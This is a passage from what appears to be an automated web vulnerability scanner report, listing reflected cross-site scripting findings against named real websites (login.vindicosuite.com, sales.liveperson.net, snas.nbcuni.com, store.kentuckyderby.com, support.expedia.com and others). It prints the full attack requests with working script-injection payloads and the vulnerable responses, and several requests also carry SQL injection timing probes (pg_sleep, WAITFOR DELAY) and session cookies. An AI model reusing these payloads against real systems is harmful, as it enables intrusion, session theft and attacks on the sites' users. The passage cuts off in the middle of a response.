
The value of the totalvalues request parameter is copied into the HTML document as plain text between tags. The payload cf847<script>alert(1)</script>aac6a0e8002 was submitted in the totalvalues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3cf847<script>alert(1)</script>aac6a0e8002 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:23:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=D667D7ACE515F68FAD80C1A183A8E4FD; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
PointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3cf847<script>alert(1)</script>aac6a0e8002


<table border="0">
...[SNIP]...

5.89. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload ecadb<script>alert(1)</script>6684c5b90cb640ea3 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Passwordecadb<script>alert(1)</script>6684c5b90cb640ea3&username=&existingPassword=&newPassword= HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=MBNPJKACNAJKJFBPLELMNGGF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3707
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:20:55 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
<div class='divMessage'>Invalid Username / Passwordecadb<script>alert(1)</script>6684c5b90cb640ea3</div>
...[SNIP]...

5.90. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 6c34d<script>alert(1)</script>032f27b5100 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password6c34d<script>alert(1)</script>032f27b5100 HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3701
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:19:36 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
<div class='divMessage'>Invalid Username / Password6c34d<script>alert(1)</script>032f27b5100</div>
...[SNIP]...

5.91. http://login.vindicosuite.com/default.asp [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 8a741<script>alert(1)</script>c3baafbd359 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password8a741<script>alert(1)</script>c3baafbd359 HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2335
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<td width="247" height="33" colspan="2">Invalid Username and or Password8a741<script>alert(1)</script>c3baafbd359</td>
...[SNIP]...

5.92. http://login.vindicosuite.com/default.asp [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 51889<script>alert(1)</script>3e60f2b813cb8e4d1 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password51889<script>alert(1)</script>3e60f2b813cb8e4d1&password=%27;WAITFOR%20DELAY%20%270:0:0%27-- HTTP/1.1
Referer: http://login.vindicosuite.com/vindico_dynamic.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=CMNPJKACHIDMMJGMMEKHFGND
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2341
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:32:21 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<td width="247" height="33" colspan="2">Invalid Username and or Password51889<script>alert(1)</script>3e60f2b813cb8e4d1</td>
...[SNIP]...

5.93. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 953fa%0aalert(1)//44bb86f9bed was submitted in the url parameter. This input was echoed as 953fa
alert(1)//44bb86f9bed
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml953fa%0aalert(1)//44bb86f9bed&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/ HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:06:58 GMT
Expires: Fri, 06 May 2011 21:06:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xml953fa
alert(1)//44bb86f9bed
. HTTP error 400

5.94. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload ec21a%0aalert(1)//7e817ac7b43 was submitted in the site parameter. This input was echoed as ec21a
alert(1)//7e817ac7b43
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=56727252ec21a%0aalert(1)//7e817ac7b43&d_id=software-soa HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 07 May 2011 01:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSQSQTAC=IOMLOCHABCHAGDICAICNNINC; path=/
Cache-control: private

//Plugins for site 56727252ec21a
alert(1)//7e817ac7b43

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...

5.95. https://secure.trust-guard.com/index.php [txtEmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The value of the txtEmail request parameter is copied into the HTML document as plain text between tags. The payload 16a1d<script>alert(1)</script>7c0a4356b71 was submitted in the txtEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /index.php HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=todvqp9ae2pb55so66dlntmpe4
Accept-Encoding: gzip, deflate
Content-Length: 38

btnLogin=Submit&txtEmail=16a1d<script>alert(1)</script>7c0a4356b71&txtPassword=

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:57:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5133
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<span id='lblResult' style='color:red; ' >We could not find the account 16a1d<script>alert(1)</script>7c0a4356b71.</span>
...[SNIP]...

5.96. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f2acb<script>alert(1)</script>b1a3aa827ff was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallbackf2acb<script>alert(1)</script>b1a3aa827ff HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E2E4E0051D3A52-6000010BE0167355[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:38:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=28C39803DCD2F9DBB5A42349EF724DCA; Path=/
Cache-Control: max-age=10
Expires: Sat, 07 May 2011 22:38:58 GMT
Content-Length: 137
Content-Type: text/html

__nbcsnasadops.doSCallbackf2acb<script>alert(1)</script>b1a3aa827ff({ "cookie":{"s_vi":"[CS]v1|26E2E4E0051D3A52-6000010BE0167355[CE]"}});

5.97. http://store.kentuckyderby.com/cart.php [rs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.kentuckyderby.com
Path:   /cart.php

Issue detail

The value of the rs request parameter is copied into the HTML document as plain text between tags. The payload 98ed9<script>alert(1)</script>71d28279f0b was submitted in the rs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.php?m=product_detail&p=221&catID=37&rs=displayOptionImage98ed9<script>alert(1)</script>71d28279f0b&rst=&rsrnd=1304820549320&rsargs%5B%5D=829 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: store.kentuckyderby.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:09:17 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.1.6
Set-Cookie: digiSHOPID=5e3623b0eb6e8b94e1566139ca496cd9; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 21:09:17 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 76
Connection: close
Content-Type: text/html


-:displayOptionImage98ed9<script>alert(1)</script>71d28279f0b not callable

5.98. https://subscribe.haymarketmedia.com/scm/ [form parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The value of the form request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4039d"%3balert(1)//8ac54b4c9a7 was submitted in the form parameter. This input was echoed as 4039d";alert(1)//8ac54b4c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scm/?form=4039d"%3balert(1)//8ac54b4c9a7 HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xgwhobb5t5qhqnfgg1yyct45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:28 GMT
Content-Length: 5494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1290429-25");
pageTracker._initData();
pageTracker._trackPageview("scm_4039d";alert(1)//8ac54b4c9a7_IS1105");
</script>
...[SNIP]...

5.99. http://support.expedia.com/app/answers/list/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /app/answers/list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cdc4"><a>ac9888ba52a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /app/answers/list/?1cdc4"><a>ac9888ba52a=1 HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; cp_session=UylSJgVxACRUPAJyAGoEaQRCDBEAA1FsA3EJOlZ2AngBcwR4ACYFPAF7WS1QIlIhACADPQd2VW4AJgM5ASBUdARyXyIBMAUSBHEIMwZEBCJTYFJCBXUAcVRxAn4ANgR9BHAMOwAxUWwDZAl%2FVjcCOwE8BCgANgVAAXBZelA1UnEAYAMXBzVVMwBhAz8BIFQuBGZfawFvBXYEZwhHBnMEdFMxUnYFJwA1VEICNgA%2FBGAEeAx7AGdRMwN2CSRWNgI5AXQEPgBABTcBJVk9UGFSNwA7AyUHLVVxADcDFQEVVFUEUV8iATEFZQQ3CGgGdgRjU3dSNwVGAEJUUgIHAHYENwQ2DDoANFFxA2AJYFZxAmcBFQQoADYFMAFtWWFQI1I8AHcDYgcQVWEAIQNjARJUMQQnXzUBRQVhBGQIMAYzBCJTYFIyBXAAYVR1AiQAdgQ2BEQMbwBwUTcDMwkjVjMCMQE1BCgANwVCATFZP1ByUmYAZAM3ByxVJwBwA3QBZ1REBDJfIgExBWUEOAhuBmMEY1N3UjcFRgA3VCMCYgBlBGYEQQw6ACBRIAM2CRVWZQJxAWMEOwB2BWABcll9UHJSZwAWA3wHYFVmAD0DdAFnVEYEIF96AS8FcQQxCCMGOAQlUw5SKwVxAGNUdQIjADoEagRuDAIAelFJAzYJH1YkAg4BEgQ1ADEFZAFFWUVQB1ICAD8DPQdkVTUAcwNsAWlUIgR%2F; supportsurvey=1; 
s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%2526function%2520%2528%2529%257Bvar%2520a%253D%255B%2522%257B%2522%255D%252Cb%252Ck%252Cv%253Bfunction%2520p%2528s%2529%257Bif%2528b%2529%257Ba.push%2528%2522%252C%2522%2529%253B%257D%250Aa.push%2528k.toJSONString%2528%2529%252C%2522%253A%2522%252Cs%2529%253Bb%253Dtrue%253B%257D%250Afor%2528k%2520in%2520this%2529%257Bif%2528this.hasOwnProperty%2528k%2529%2529%257Bv%253Dthis%255Bk%255D%253Bswitch%2528typeof%2520v%2529%257Bcase%2522object%2522%253Aif%2528v%2529%257Bif%2528typeof%2520v.toJSONString%253D%253D%253D%2522function%2522%2529%257Bp%2528v.toJSONString%2528%2529%2529%253B%257D%257Delse%257Bp%2528%2522null%2522%2529%253B%257D%250Abreak%253Bcase%2522string%2522%253Acase%2522number%2522%253Acase%2522boolean%2522%253Ap%2528v.toJSONString%2528%2529%2529%253B%257D%257D%257D%250Aa.push%2528%2522%257D%2522%2529%253B
return%2520a.join%2528%2522%2522%2529%253B%257D%253DtoJSONString%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:53:03 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9RJQx4ByMBaVcnVT8BbAFHDBFdXgY7AnBaaVZ2UigBc1IuAyUAOQF7ViIGdAh7UXFSbAFwADsAJlVvByYGJgN1AH0HNgUSUSQEPwZEAyVVZlFBDHwHdgEkVytVYwF4AXUMO11sBjsCZVosVjdSawE8Un4DNQBFAXBWdQZjCCtRMVJGATMAZgBhVWkHJgZ8A2EANAdpBXZRMgRLBnMDc1U3UXUMLgcyARdXY1VqAWUBfQx7XToGZAJ3WndWNlJpAXRSaANDADIBJVYyBjcIbVFqUnQBKwAkADdVQwcTBgcDVgB9BzcFZVFiBGQGdgNkVXFRNAxPB0UBB1dSVSMBMgEzDDpdaQYmAmFaM1ZxUjcBFVJ%2BAzUANQFtVm4GdQhmUSZSMwEWADQAIVU1BxQGYwMgAGoHQwVhUTEEPAYzAyVVZlExDHkHZgEgV3FVIwEzAUEMb10tBmACMlpwVjNSYQE1Un4DNABHATFWMAYkCDxRNVJmASoAcgBwVSIHYQYWAzUAfQc3BWVRbQRiBmMDZFVxUTQMTwcwAXZXN1UwAWMBRAw6XX0GdwI3WkZWZVIhAWNSbQN1AGUBclZyBiQIPVFHUi0BZgAzAD1VIgdhBhQDJwB0BycFbFEwBG4GZgNjVWBRWwwpBz8Bb1dkVTgBYQFmDGddMAZqAjxaYFY1UjEBY1I6AzoAMgEiVjoGZwhvUW9ScwE3AHwAKFUlBzcGcAM%2FAHoHWQV8UXIEaAZxA3NVPVFoDGUHXQF8V0lVNQFOAXUMBF1LBmoCMVpgVhFSTgEBUg0DagBvATBWYQZ2CDNRPlIiAS8%3D; path=/
RNT-Time: D=3309637 t=1304722383037218
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95354


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
<a class = "noIntercept" href="/app/answers/list/?1cdc4"><a>ac9888ba52a=1/kw/" >
...[SNIP]...

5.100. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe082'%3balert(1)//d9fdfca37be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe082';alert(1)//d9fdfca37be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?mm_pub=7348&fe082'%3balert(1)//d9fdfca37be=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:38:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
